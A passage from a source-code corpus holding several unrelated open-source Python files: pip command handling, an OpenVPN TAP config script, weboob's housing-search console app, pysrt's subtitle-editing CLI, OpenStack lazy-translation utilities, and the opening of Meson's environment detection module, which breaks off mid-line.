"loggers": dict( ( name, { "level": ( "WARNING" if level in ["INFO", "ERROR"] else "DEBUG" ), }, ) for name in ["pip._vendor", "distlib", "requests", "urllib3"] ), }) if options.log_explicit_levels: warnings.warn( "--log-explicit-levels has been deprecated and will be removed" " in a future version.", RemovedInPip8Warning, ) # TODO: try to get these passing down from the command? # without resorting to os.environ to hold these. if options.no_input: os.environ['PIP_NO_INPUT'] = '1' if options.exists_action: os.environ['PIP_EXISTS_ACTION'] = ' '.join(options.exists_action) if options.require_venv: # If a venv is required check if it can really be found if not running_under_virtualenv(): logger.critical( 'Could not find an activated virtualenv (required).' ) sys.exit(VIRTUALENV_NOT_FOUND) try: status = self.run(options, args) # FIXME: all commands should return an exit status # and when it is done, isinstance is not needed anymore if isinstance(status, int): return status except PreviousBuildDirError as exc: logger.critical(str(exc)) logger.debug('Exception information:', exc_info=True) return PREVIOUS_BUILD_DIR_ERROR except (InstallationError, UninstallationError, BadCommand) as exc: logger.critical(str(exc)) logger.debug('Exception information:', exc_info=True) return ERROR except CommandError as exc: logger.critical('ERROR: %s', exc) logger.debug('Exception information:', exc_info=True) return ERROR except KeyboardInterrupt: logger.critical('Operation cancelled by user') logger.debug('Exception information:', exc_info=True) return ERROR except: logger.critical('Exception:', exc_info=True) return UNKNOWN_ERROR finally: # Check if we're using the latest version of pip available if (not options.disable_pip_version_check and not getattr(options, "no_index", False)): with self._build_session( options, retries=0, timeout=min(5, options.timeout)) as session: pip_version_check(session) return SUCCESS class RequirementCommand(Command): @staticmethod def 
populate_requirement_set(requirement_set, args, options, finder, session, name, wheel_cache): """ Marshal cmd line args into a requirement set. """ for filename in options.constraints: for req in parse_requirements( filename, constraint=True, finder=finder, options=options, session=session, wheel_cache=wheel_cache): requirement_set.add_requirement(req) for req in args: requirement_set.add_requirement( InstallRequirement.from_line( req, None, isolated=options.isolated_mode, wheel_cache=wheel_cache ) ) for req in options.editables: requirement_set.add_requirement( InstallRequirement.from_editable( req, default_vcs=options.default_vcs, isolated=options.isolated_mode, wheel_cache=wheel_cache ) ) found_req_in_file = False for filename in options.requirements: for req in parse_requirements( filename, finder=finder, options=options, session=session, wheel_cache=wheel_cache): found_req_in_file = True requirement_set.add_requirement(req) if not (args or options.editables or found_req_in_file): opts = {'name': name} if options.find_links: msg = ('You must give at least one requirement to ' '%(name)s (maybe you meant "pip %(name)s ' '%(links)s"?)' % dict(opts, links=' '.join(options.find_links))) else: msg = ('You must give at least one requirement ' 'to %(name)s (see "pip help %(name)s")' % opts) logger.warning(msg)
mit
ThomasHabets/openvpn-debian
win/config_tap.py
5
1181
import os from wb import preprocess, home_fn, autogen, dict_def def main(config): preprocess(config, in_fn=home_fn('tap-win32/SOURCES.in'), out_fn=home_fn('tap-win32/SOURCES'), quote_begin='@@', quote_end='@@', head_comment='# %s\n\n' % autogen) preprocess(config, in_fn=home_fn('tap-win32/i386/OemWin2k.inf.in'), out_fn=home_fn('tap-win32/i386/OemWin2k.inf'), quote_begin='@@', quote_end='@@', if_prefix='!', head_comment='; %s\n\n' % autogen) try: os.mkdir(home_fn('tap-win32/amd64')) except: pass preprocess(dict_def(config, [('AMD64', '1')]), in_fn=home_fn('tap-win32/i386/OemWin2k.inf.in'), out_fn=home_fn('tap-win32/amd64/OemWin2k.inf'), quote_begin='@@', quote_end='@@', if_prefix='!', head_comment='; %s\n\n' % autogen) # if we are run directly, and not loaded as a module if __name__ == "__main__": from wb import config main(config)
gpl-2.0
blckshrk/Weboob
weboob/applications/flatboob/flatboob.py
1
6209
# -*- coding: utf-8 -*-

# Copyright(C) 2012 Romain Bignon
#
# This file is part of weboob.
#
# weboob is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# weboob is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with weboob. If not, see <http://www.gnu.org/licenses/>.

# NOTE(review): this module is Python 2 code (print statements,
# dict.iteritems()); it cannot run unchanged on Python 3.

import sys

from weboob.capabilities.housing import ICapHousing, Query
from weboob.tools.application.repl import ReplApplication, defaultcount
from weboob.tools.application.formatters.iformatter import IFormatter, PrettyFormatter


__all__ = ['Flatboob']


class HousingFormatter(IFormatter):
    """Full-detail console formatter for a single housing ad."""

    MANDATORY_FIELDS = ('id', 'title', 'cost', 'currency', 'area', 'date', 'text')

    def format_obj(self, obj, alias):
        """Render *obj* (a housing ad) as a multi-line text block.

        Optional fields (phone date, location, station, photos, details)
        are printed only when present and non-empty.
        """
        result = u'%s%s%s\n' % (self.BOLD, obj.title, self.NC)
        result += 'ID: %s\n' % obj.fullid
        result += 'Cost: %s%s\n' % (obj.cost, obj.currency)
        result += u'Area: %sm²\n' % (obj.area)
        if obj.date:
            result += 'Date: %s\n' % obj.date.strftime('%Y-%m-%d')
        result += 'Phone: %s\n' % obj.phone
        if hasattr(obj, 'location') and obj.location:
            result += 'Location: %s\n' % obj.location
        if hasattr(obj, 'station') and obj.station:
            result += 'Station: %s\n' % obj.station

        if hasattr(obj, 'photos') and obj.photos:
            result += '\n%sPhotos%s\n' % (self.BOLD, self.NC)
            for photo in obj.photos:
                result += ' * %s\n' % photo.url

        result += '\n%sDescription%s\n' % (self.BOLD, self.NC)
        result += obj.text

        if hasattr(obj, 'details') and obj.details:
            result += '\n\n%sDetails%s\n' % (self.BOLD, self.NC)
            # Python 2 dict iteration; key order is unspecified.
            for key, value in obj.details.iteritems():
                result += ' %s: %s\n' % (key, value)
        return result


class HousingListFormatter(PrettyFormatter):
    """Compact formatter used for 'search' result lists."""

    MANDATORY_FIELDS = ('id', 'title', 'cost', 'text')

    def get_title(self, obj):
        # "<cost><currency> - <title>"
        return '%s%s - %s' % (obj.cost, obj.currency, obj.title)

    def get_description(self, obj):
        # Prefix the ad text with its date when available.
        result = u''
        if hasattr(obj, 'date') and obj.date:
            result += '%s - ' % obj.date.strftime('%Y-%m-%d')
        result += obj.text
        return result


class Flatboob(ReplApplication):
    """REPL console application to search housing ads via weboob backends."""

    APPNAME = 'flatboob'
    VERSION = '0.h'
    COPYRIGHT = 'Copyright(C) 2012 Romain Bignon'
    DESCRIPTION = "Console application to search for housing."
    SHORT_DESCRIPTION = "search for housing"
    CAPS = ICapHousing
    EXTRA_FORMATTERS = {'housing_list': HousingListFormatter,
                        'housing': HousingFormatter,
                        }
    COMMANDS_FORMATTERS = {'search': 'housing_list',
                           'info': 'housing',
                           }

    def main(self, argv):
        self.load_config()
        return ReplApplication.main(self, argv)

    @defaultcount(10)
    def do_search(self, line):
        """
        search

        Search for housing. Parameters are interactively asked.
        """
        pattern = 'notempty'
        query = Query()
        query.cities = []
        # Interactively build query.cities until the user enters an
        # empty pattern.
        while pattern:
            if len(query.cities) > 0:
                print '\n%sSelected cities:%s %s' % (self.BOLD, self.NC, ', '.join([c.name for c in query.cities]))
            pattern = self.ask('Enter a city pattern (or empty to stop)', default='')
            if not pattern:
                break

            cities = []
            for backend, city in self.weboob.do('search_city', pattern):
                cities.append(city)

            if len(cities) == 0:
                print '  Not found!'
                continue
            # Single match: 'city' is the variable left over from the
            # backend loop above, i.e. the one city that was found.
            # Selecting it again toggles it out of the query.
            if len(cities) == 1:
                if city in query.cities:
                    query.cities.remove(city)
                else:
                    query.cities.append(city)
                continue

            # Several matches: numbered menu; each chosen entry toggles
            # its membership in query.cities until an empty answer.
            r = 'notempty'
            while r != '':
                for i, city in enumerate(cities):
                    print '  %s%2d)%s [%s] %s' % (self.BOLD, i+1, self.NC, 'x' if city in query.cities else ' ', city.name)
                r = self.ask('  Select cities (or empty to stop)', regexp='(\d+|)', default='')
                if not r.isdigit():
                    continue
                r = int(r)
                if r <= 0 or r > len(cities):
                    continue
                city = cities[r-1]
                if city in query.cities:
                    query.cities.remove(city)
                else:
                    query.cities.append(city)

        # All numeric criteria are optional (None when left empty).
        query.area_min = self.ask_int('Enter min area')
        query.area_max = self.ask_int('Enter max area')
        query.cost_min = self.ask_int('Enter min cost')
        query.cost_max = self.ask_int('Enter max cost')
        query.nb_rooms = self.ask_int('Enter number of rooms')

        self.change_path([u'housings'])
        self.start_format()
        for backend, housing in self.do('search_housings', query):
            self.cached_format(housing)

    def ask_int(self, txt):
        """Ask for an optional integer; return None on empty input."""
        r = self.ask(txt, default='', regexp='(\d+|)')
        if r:
            return int(r)
        return None

    def complete_info(self, text, line, *ignored):
        # Tab-completion for the 'info' command: complete object IDs
        # once the command word itself has been typed.
        args = line.split(' ')
        if len(args) == 2:
            return self._complete_object()

    def do_info(self, _id):
        """
        info ID

        Get information about a housing.
        """
        if not _id:
            print >>sys.stderr, 'This command takes an argument: %s' % self.get_command_help('info', short=True)
            return 2

        housing = self.get_object(_id, 'get_housing')
        if not housing:
            print >>sys.stderr, 'Housing not found: %s' % _id
            return 3

        self.start_format()
        self.format(housing)
agpl-3.0
dannyboi104/SickRage
lib/pysrt/commands.py
71
8471
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# pylint: disable-all
"""srt: command-line tool to shift, rescale, split and re-wrap
SubRip (.srt) subtitle files."""
import os
import re
import sys
import codecs
import shutil
import argparse
from textwrap import dedent

from chardet import detect
from pysrt import SubRipFile, SubRipTime, VERSION_STRING


def underline(string):
    """Return *string* wrapped in ANSI underline escape sequences."""
    return "\033[4m%s\033[0m" % string


class TimeAwareArgumentParser(argparse.ArgumentParser):
    """ArgumentParser that keeps negative time offsets (e.g. ``-1s500ms``)
    from being parsed as option flags, by inserting a ``--`` separator
    before the first time-looking argument."""

    RE_TIME_REPRESENTATION = re.compile(r'^\-?(\d+[hms]{0,2}){1,4}$')

    def parse_args(self, args=None, namespace=None):
        # BUG FIX: argparse's contract is that args=None means
        # sys.argv[1:]; the original crashed on enumerate(None) when
        # called without an explicit argument list.
        if args is None:
            args = sys.argv[1:]
        time_index = -1
        for index, arg in enumerate(args):
            match = self.RE_TIME_REPRESENTATION.match(arg)
            if match:
                time_index = index
                break

        if time_index >= 0:
            args.insert(time_index, '--')

        return super(TimeAwareArgumentParser, self).parse_args(args, namespace)


class SubRipShifter(object):
    """Implements the srt sub-commands: shift, rate, split and break."""

    BACKUP_EXTENSION = '.bak'
    RE_TIME_STRING = re.compile(r'(\d+)([hms]{0,2})')
    # Multipliers converting each unit suffix to milliseconds.
    UNIT_RATIOS = {
        'ms': 1,
        '': SubRipTime.SECONDS_RATIO,
        's': SubRipTime.SECONDS_RATIO,
        'm': SubRipTime.MINUTES_RATIO,
        'h': SubRipTime.HOURS_RATIO,
    }
    DESCRIPTION = dedent("""\
    Srt subtitle editor

    It can either shift, split or change the frame rate.
    """)
    TIMESTAMP_HELP = "A timestamp in the form: [-][Hh][Mm]S[s][MSms]"
    SHIFT_EPILOG = dedent("""\

    Examples:
        1 minute and 12 seconds foreward (in place):
            $ srt -i shift 1m12s movie.srt

        half a second foreward:
            $ srt shift 500ms movie.srt > othername.srt

        1 second and half backward:
            $ srt -i shift -1s500ms movie.srt

        3 seconds backward:
            $ srt -i shift -3 movie.srt
    """)
    RATE_EPILOG = dedent("""\

    Examples:
        Convert 23.9fps subtitles to 25fps:
            $ srt -i rate 23.9 25 movie.srt
    """)
    LIMITS_HELP = "Each parts duration in the form: [Hh][Mm]S[s][MSms]"
    SPLIT_EPILOG = dedent("""\

    Examples:
        For a movie in 2 parts with the first part 48 minutes and 18 seconds long:
            $ srt split 48m18s movie.srt
            => creates movie.1.srt and movie.2.srt

        For a movie in 3 parts of 20 minutes each:
            $ srt split 20m 20m movie.srt
            => creates movie.1.srt, movie.2.srt and movie.3.srt
    """)
    FRAME_RATE_HELP = "A frame rate in fps (commonly 23.9 or 25)"
    ENCODING_HELP = dedent("""\
        Change file encoding. Useful for players accepting only latin1 subtitles.
        List of supported encodings: http://docs.python.org/library/codecs.html#standard-encodings
    """)
    BREAK_EPILOG = dedent("""\
        Break lines longer than defined length
    """)
    LENGTH_HELP = "Maximum number of characters per line"

    def __init__(self):
        # Set by create_backup() when editing in place; None means
        # results go to stdout.
        self.output_file_path = None

    def build_parser(self):
        """Build and return the top-level parser with one sub-parser
        per command; each sub-parser binds its handler via set_defaults."""
        parser = TimeAwareArgumentParser(description=self.DESCRIPTION, formatter_class=argparse.RawTextHelpFormatter)
        parser.add_argument('-i', '--in-place', action='store_true', dest='in_place',
                            help="Edit file in-place, saving a backup as file.bak (do not works for the split command)")
        parser.add_argument('-e', '--output-encoding', metavar=underline('encoding'), action='store', dest='output_encoding',
                            type=self.parse_encoding, help=self.ENCODING_HELP)
        parser.add_argument('-v', '--version', action='version', version='%%(prog)s %s' % VERSION_STRING)
        subparsers = parser.add_subparsers(title='commands')

        shift_parser = subparsers.add_parser('shift', help="Shift subtitles by specified time offset", epilog=self.SHIFT_EPILOG, formatter_class=argparse.RawTextHelpFormatter)
        shift_parser.add_argument('time_offset', action='store', metavar=underline('offset'),
                                  type=self.parse_time, help=self.TIMESTAMP_HELP)
        shift_parser.set_defaults(action=self.shift)

        rate_parser = subparsers.add_parser('rate', help="Convert subtitles from a frame rate to another", epilog=self.RATE_EPILOG, formatter_class=argparse.RawTextHelpFormatter)
        rate_parser.add_argument('initial', action='store', type=float, help=self.FRAME_RATE_HELP)
        rate_parser.add_argument('final', action='store', type=float, help=self.FRAME_RATE_HELP)
        rate_parser.set_defaults(action=self.rate)

        split_parser = subparsers.add_parser('split', help="Split a file in multiple parts", epilog=self.SPLIT_EPILOG, formatter_class=argparse.RawTextHelpFormatter)
        split_parser.add_argument('limits', action='store', nargs='+', type=self.parse_time, help=self.LIMITS_HELP)
        split_parser.set_defaults(action=self.split)

        break_parser = subparsers.add_parser('break', help="Break long lines", epilog=self.BREAK_EPILOG, formatter_class=argparse.RawTextHelpFormatter)
        break_parser.add_argument('length', action='store', type=int, help=self.LENGTH_HELP)
        break_parser.set_defaults(action=self.break_lines)

        parser.add_argument('file', action='store')

        return parser

    def run(self, args):
        """Parse *args* and dispatch to the selected command handler."""
        parser = self.build_parser()
        self.arguments = parser.parse_args(args)
        # BUG FIX: on Python 3 sub-commands are optional by default, so a
        # bare invocation left 'action' unset and crashed with
        # AttributeError; emit a proper usage error instead.
        if not hasattr(self.arguments, 'action'):
            parser.error('a command is required')
        if self.arguments.in_place:
            self.create_backup()
        self.arguments.action()

    def parse_time(self, time_string):
        """Parse '[-][Hh][Mm]S[s][MSms]' into a signed millisecond count."""
        negative = time_string.startswith('-')
        if negative:
            time_string = time_string[1:]
        ordinal = sum(int(value) * self.UNIT_RATIOS[unit] for value, unit
                      in self.RE_TIME_STRING.findall(time_string))
        return -ordinal if negative else ordinal

    def parse_encoding(self, encoding_name):
        """Validate *encoding_name* against the codecs registry."""
        try:
            codecs.lookup(encoding_name)
        except LookupError as error:
            # BUG FIX: LookupError has no .message attribute on Python 3
            # (and .message was deprecated since Python 2.6); str() works
            # on both.
            raise argparse.ArgumentTypeError(str(error))
        return encoding_name

    def shift(self):
        """Shift every cue by the parsed time offset."""
        self.input_file.shift(milliseconds=self.arguments.time_offset)
        self.input_file.write_into(self.output_file)

    def rate(self):
        """Rescale timestamps from the initial to the final frame rate."""
        ratio = self.arguments.final / self.arguments.initial
        self.input_file.shift(ratio=ratio)
        self.input_file.write_into(self.output_file)

    def split(self):
        """Write file.1.srt, file.2.srt, ... one per requested duration,
        each re-based to start at zero with clean cue indexes."""
        limits = [0] + self.arguments.limits + [self.input_file[-1].end.ordinal + 1]
        base_name, extension = os.path.splitext(self.arguments.file)
        for index, (start, end) in enumerate(zip(limits[:-1], limits[1:])):
            file_name = '%s.%s%s' % (base_name, index + 1, extension)
            part_file = self.input_file.slice(ends_after=start, starts_before=end)
            part_file.shift(milliseconds=-start)
            part_file.clean_indexes()
            part_file.save(path=file_name, encoding=self.output_encoding)

    def create_backup(self):
        """Copy the input to file.bak (once) and swap paths so the edit
        reads from the backup and writes over the original file."""
        backup_file = self.arguments.file + self.BACKUP_EXTENSION
        if not os.path.exists(backup_file):
            shutil.copy2(self.arguments.file, backup_file)
        self.output_file_path = self.arguments.file
        self.arguments.file = backup_file

    def break_lines(self):
        """Re-wrap subtitle text to at most 'length' characters per line,
        breaking only at whitespace."""
        split_re = re.compile(r'(.{,%i})(?:\s+|$)' % self.arguments.length)
        for item in self.input_file:
            # Odd capture groups hold the wrapped chunks.
            item.text = '\n'.join(split_re.split(item.text)[1::2])
        self.input_file.write_into(self.output_file)

    @property
    def output_encoding(self):
        # Explicit -e option wins; otherwise keep the input file encoding.
        return self.arguments.output_encoding or self.input_file.encoding

    @property
    def input_file(self):
        """Lazily open the input file, sniffing its encoding with chardet."""
        if not hasattr(self, '_source_file'):
            with open(self.arguments.file, 'rb') as f:
                content = f.read()
                encoding = detect(content).get('encoding')
                encoding = self.normalize_encoding(encoding)

            self._source_file = SubRipFile.open(self.arguments.file,
                                                encoding=encoding, error_handling=SubRipFile.ERROR_LOG)
        return self._source_file

    @property
    def output_file(self):
        """Lazily open the output stream: the original path when editing
        in place, stdout otherwise."""
        if not hasattr(self, '_output_file'):
            if self.output_file_path:
                self._output_file = codecs.open(self.output_file_path, 'w+', encoding=self.output_encoding)
            else:
                self._output_file = sys.stdout
        return self._output_file

    def normalize_encoding(self, encoding):
        """Map a chardet encoding name to codecs style ('UTF-8' -> 'utf_8').

        BUG FIX: chardet's detect() returns {'encoding': None} for
        undetectable content; fall back to UTF-8 instead of crashing
        on None.lower().
        """
        if not encoding:
            return 'utf_8'
        return encoding.lower().replace('-', '_')


def main():
    SubRipShifter().run(sys.argv[1:])

if __name__ == '__main__':
    main()
gpl-3.0
kionetworks/openstack-dashboard-havana
openstack_dashboard/openstack/common/gettextutils.py
23
7462
# vim: tabstop=4 shiftwidth=4 softtabstop=4

# Copyright 2012 Red Hat, Inc.
# All Rights Reserved.
# Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
#    http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.

"""
gettext for openstack-common modules.

Usual usage in an openstack.common module:

    from openstack_dashboard.openstack.common.gettextutils import _
"""

# NOTE(review): Python 2 only module (UserString module, unicode(),
# ugettext()); none of these exist on Python 3.
import copy
import gettext
import logging.handlers
import os
import UserString

# The locale directory can be overridden through the
# OPENSTACK_DASHBOARD_LOCALEDIR environment variable; fallback=True keeps
# untranslated strings working when no catalog is installed.
_localedir = os.environ.get('openstack_dashboard'.upper() + '_LOCALEDIR')
_t = gettext.translation('openstack_dashboard', localedir=_localedir,
                         fallback=True)


def _(msg):
    # Immediate (non-lazy) translation in this project's domain.
    return _t.ugettext(msg)


def install(domain):
    """Install a _() function using the given translation domain.

    Given a translation domain, install a _() function using gettext's
    install() function.

    The main difference from gettext.install() is that we allow
    overriding the default localedir (e.g. /usr/share/locale) using
    a translation-domain-specific environment variable (e.g.
    NOVA_LOCALEDIR).
    """
    gettext.install(domain,
                    localedir=os.environ.get(domain.upper() + '_LOCALEDIR'),
                    unicode=True)


"""
Lazy gettext functionality.

The following is an attempt to introduce a deferred way to do translations
on messages in OpenStack. We attempt to override the standard _() function
and % (format string) operation to build Message objects that can later be
translated when we have more information.

Also included is an example LogHandler that translates Messages to an
associated locale, effectively allowing many logs, each with their own
locale.
"""


def get_lazy_gettext(domain):
    """Assemble and return a lazy gettext function for a given domain.

    Factory method for a project/module to get a lazy gettext function
    for its own translation domain (i.e. nova, glance, cinder, etc.)
    """

    def _lazy_gettext(msg):
        """
        Create and return a Message object encapsulating a string
        so that we can translate it later when needed.
        """
        return Message(msg, domain)

    return _lazy_gettext


class Message(UserString.UserString, object):
    """Class used to encapsulate translatable messages.

    Stores the gettext msgid plus everything needed to render it later
    (locale, % parameters, extra text concatenated on either side), and
    resolves to a translated unicode string through the ``data`` property.
    """
    def __init__(self, msg, domain):
        # _msg is the gettext msgid and should never change
        self._msg = msg
        # Untranslated text appended around the msgid via + / __radd__.
        self._left_extra_msg = ''
        self._right_extra_msg = ''
        # % parameters captured by __mod__, injected at render time.
        self.params = None
        # Target locale; None means "use the system locale".
        self.locale = None
        self.domain = domain

    @property
    def data(self):
        # NOTE(mrodden): this should always resolve to a unicode string
        # that best represents the state of the message currently

        localedir = os.environ.get(self.domain.upper() + '_LOCALEDIR')
        if self.locale:
            lang = gettext.translation(self.domain,
                                       localedir=localedir,
                                       languages=[self.locale],
                                       fallback=True)
        else:
            # use system locale for translations
            lang = gettext.translation(self.domain,
                                       localedir=localedir,
                                       fallback=True)

        full_msg = (self._left_extra_msg +
                    lang.ugettext(self._msg) +
                    self._right_extra_msg)

        if self.params is not None:
            full_msg = full_msg % self.params

        return unicode(full_msg)

    def _save_parameters(self, other):
        # we check for None later to see if
        # we actually have parameters to inject,
        # so encapsulate if our parameter is actually None
        if other is None:
            self.params = (other, )
        else:
            # Deep-copy so later mutation of the caller's object cannot
            # change what this message renders to.
            self.params = copy.deepcopy(other)

        return self

    # overrides to be more string-like
    def __unicode__(self):
        return self.data

    def __str__(self):
        return self.data.encode('utf-8')

    def __getstate__(self):
        # Explicit pickle support: deep-copy only the known attributes.
        to_copy = ['_msg', '_right_extra_msg', '_left_extra_msg',
                   'domain', 'params', 'locale']
        new_dict = self.__dict__.fromkeys(to_copy)
        for attr in to_copy:
            new_dict[attr] = copy.deepcopy(self.__dict__[attr])

        return new_dict

    def __setstate__(self, state):
        for (k, v) in state.items():
            setattr(self, k, v)

    # operator overloads
    def __add__(self, other):
        # Message + other: other is kept untranslated on the right.
        copied = copy.deepcopy(self)
        copied._right_extra_msg += other.__str__()
        return copied

    def __radd__(self, other):
        # other + Message: other is kept untranslated on the left.
        copied = copy.deepcopy(self)
        copied._left_extra_msg += other.__str__()
        return copied

    def __mod__(self, other):
        # do a format string to catch and raise
        # any possible KeyErrors from missing parameters
        self.data % other
        copied = copy.deepcopy(self)
        return copied._save_parameters(other)

    def __mul__(self, other):
        return self.data * other

    def __rmul__(self, other):
        return other * self.data

    def __getitem__(self, key):
        return self.data[key]

    def __getslice__(self, start, end):
        return self.data.__getslice__(start, end)

    def __getattribute__(self, name):
        # NOTE(mrodden): handle lossy operations that we can't deal with yet
        # These override the UserString implementation, since UserString
        # uses our __class__ attribute to try and build a new message
        # after running the inner data string through the operation.
        # At that point, we have lost the gettext message id and can just
        # safely resolve to a string instead.
        ops = ['capitalize', 'center', 'decode', 'encode',
               'expandtabs', 'ljust', 'lstrip', 'replace', 'rjust', 'rstrip',
               'strip', 'swapcase', 'title', 'translate', 'upper', 'zfill']
        if name in ops:
            return getattr(self.data, name)
        else:
            return UserString.UserString.__getattribute__(self, name)


class LocaleHandler(logging.Handler):
    """Handler that can have a locale associated to translate Messages.

    A quick example of how to utilize the Message class above.
    LocaleHandler takes a locale and a target logging.Handler object
    to forward LogRecord objects to after translating the internal Message.
    """

    def __init__(self, locale, target):
        """
        Initialize a LocaleHandler

        :param locale: locale to use for translating messages
        :param target: logging.Handler object to forward
                       LogRecord objects to after translation
        """
        logging.Handler.__init__(self)
        self.locale = locale
        self.target = target

    def emit(self, record):
        # Only Message instances carry a locale; plain strings pass
        # through unchanged.
        if isinstance(record.msg, Message):
            # set the locale and resolve to a string
            record.msg.locale = self.locale

        self.target.emit(record)
apache-2.0
MathieuDuponchelle/meson
mesonbuild/environment.py
1
54236
# Copyright 2012-2016 The Meson development team # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import configparser, os, platform, re, sys, shlex, shutil, subprocess from . import coredata from .linkers import ArLinker, ArmarLinker, VisualStudioLinker, DLinker, CcrxLinker from . import mesonlib from .mesonlib import MesonException, EnvironmentException, PerMachine, Popen_safe from . import mlog from . import compilers from .compilers import ( CompilerType, is_assembly, is_header, is_library, is_llvm_ir, is_object, is_source, ) from .compilers import ( ArmCCompiler, ArmCPPCompiler, ArmclangCCompiler, ArmclangCPPCompiler, ClangCCompiler, ClangCPPCompiler, ClangObjCCompiler, ClangObjCPPCompiler, ClangClCCompiler, ClangClCPPCompiler, G95FortranCompiler, GnuCCompiler, GnuCPPCompiler, GnuFortranCompiler, GnuObjCCompiler, GnuObjCPPCompiler, ElbrusCCompiler, ElbrusCPPCompiler, ElbrusFortranCompiler, IntelCCompiler, IntelCPPCompiler, IntelFortranCompiler, JavaCompiler, MonoCompiler, VisualStudioCsCompiler, NAGFortranCompiler, Open64FortranCompiler, PathScaleFortranCompiler, PGIFortranCompiler, RustCompiler, CcrxCCompiler, CcrxCPPCompiler, SunFortranCompiler, ValaCompiler, VisualStudioCCompiler, VisualStudioCPPCompiler, ) build_filename = 'meson.build' known_cpu_families = ( 'aarch64', 'arc', 'arm', 'e2k', 'ia64', 'mips', 'mips64', 'parisc', 'ppc', 'ppc64', 'riscv32', 'riscv64', 'rx', 's390x', 'sparc', 'sparc64', 'x86', 'x86_64' ) def detect_gcovr(version='3.1', log=False): gcovr_exe = 'gcovr' 
try: p, found = Popen_safe([gcovr_exe, '--version'])[0:2] except (FileNotFoundError, PermissionError): # Doesn't exist in PATH or isn't executable return None, None found = search_version(found) if p.returncode == 0: if log: mlog.log('Found gcovr-{} at {}'.format(found, shlex.quote(shutil.which(gcovr_exe)))) return gcovr_exe, mesonlib.version_compare(found, '>=' + version) return None, None def find_coverage_tools(): gcovr_exe, gcovr_new_rootdir = detect_gcovr() lcov_exe = 'lcov' genhtml_exe = 'genhtml' if not mesonlib.exe_exists([lcov_exe, '--version']): lcov_exe = None if not mesonlib.exe_exists([genhtml_exe, '--version']): genhtml_exe = None return gcovr_exe, gcovr_new_rootdir, lcov_exe, genhtml_exe def detect_ninja(version='1.5', log=False): for n in ['ninja', 'ninja-build', 'samu']: try: p, found = Popen_safe([n, '--version'])[0:2] except (FileNotFoundError, PermissionError): # Doesn't exist in PATH or isn't executable continue found = found.strip() # Perhaps we should add a way for the caller to know the failure mode # (not found or too old) if p.returncode == 0 and mesonlib.version_compare(found, '>=' + version): if log: mlog.log('Found ninja-{} at {}'.format(found, shlex.quote(shutil.which(n)))) return n def detect_native_windows_arch(): """ The architecture of Windows itself: x86 or amd64 """ # These env variables are always available. See: # https://msdn.microsoft.com/en-us/library/aa384274(VS.85).aspx # https://blogs.msdn.microsoft.com/david.wang/2006/03/27/howto-detect-process-bitness/ arch = os.environ.get('PROCESSOR_ARCHITEW6432', '').lower() if not arch: try: # If this doesn't exist, something is messing with the environment arch = os.environ['PROCESSOR_ARCHITECTURE'].lower() except KeyError: raise EnvironmentException('Unable to detect native OS architecture') return arch def detect_windows_arch(compilers): """ Detecting the 'native' architecture of Windows is not a trivial task. 
We cannot trust that the architecture that Python is built for is the 'native' one because you can run 32-bit apps on 64-bit Windows using WOW64 and people sometimes install 32-bit Python on 64-bit Windows. We also can't rely on the architecture of the OS itself, since it's perfectly normal to compile and run 32-bit applications on Windows as if they were native applications. It's a terrible experience to require the user to supply a cross-info file to compile 32-bit applications on 64-bit Windows. Thankfully, the only way to compile things with Visual Studio on Windows is by entering the 'msvc toolchain' environment, which can be easily detected. In the end, the sanest method is as follows: 1. Check if we're in an MSVC toolchain environment, and if so, return the MSVC toolchain architecture as our 'native' architecture. 2. If not, check environment variables that are set by Windows and WOW64 to find out the architecture that Windows is built for, and use that as our 'native' architecture. """ os_arch = detect_native_windows_arch() if os_arch != 'amd64': return os_arch # If we're on 64-bit Windows, 32-bit apps can be compiled without # cross-compilation. So if we're doing that, just set the native arch as # 32-bit and pretend like we're running under WOW64. Else, return the # actual Windows architecture that we deduced above. for compiler in compilers.values(): # Check if we're using and inside an MSVC toolchain environment if compiler.id == 'msvc' and 'VCINSTALLDIR' in os.environ: if float(compiler.get_toolset_version()) < 10.0: # On MSVC 2008 and earlier, check 'BUILD_PLAT', where # 'Win32' means 'x86' platform = os.environ.get('BUILD_PLAT', 'x86') if platform == 'Win32': return 'x86' else: # On MSVC 2010 and later 'Platform' is only set when the # target arch is not 'x86'. It's 'x64' when targeting # x86_64 and 'arm' when targeting ARM. 
platform = os.environ.get('Platform', 'x86').lower() if platform == 'x86': return platform if compiler.id == 'clang-cl' and not compiler.is_64: return 'x86' if compiler.id == 'gcc' and compiler.has_builtin_define('__i386__'): return 'x86' return os_arch def detect_cpu_family(compilers): """ Python is inconsistent in its platform module. It returns different values for the same cpu. For x86 it might return 'x86', 'i686' or somesuch. Do some canonicalization. """ if mesonlib.is_windows(): trial = detect_windows_arch(compilers) else: trial = platform.machine().lower() if trial.startswith('i') and trial.endswith('86'): return 'x86' if trial.startswith('arm'): return 'arm' if trial.startswith('ppc64'): return 'ppc64' if trial == 'powerpc': # FreeBSD calls both ppc and ppc64 "powerpc". # https://github.com/mesonbuild/meson/issues/4397 try: p, stdo, _ = Popen_safe(['uname', '-p']) except (FileNotFoundError, PermissionError): # Not much to go on here. if sys.maxsize > 2**32: return 'ppc64' return 'ppc' if 'powerpc64' in stdo: return 'ppc64' return 'ppc' if trial in ('amd64', 'x64'): trial = 'x86_64' if trial == 'x86_64': # On Linux (and maybe others) there can be any mixture of 32/64 bit # code in the kernel, Python, system etc. The only reliable way # to know is to check the compiler defines. for c in 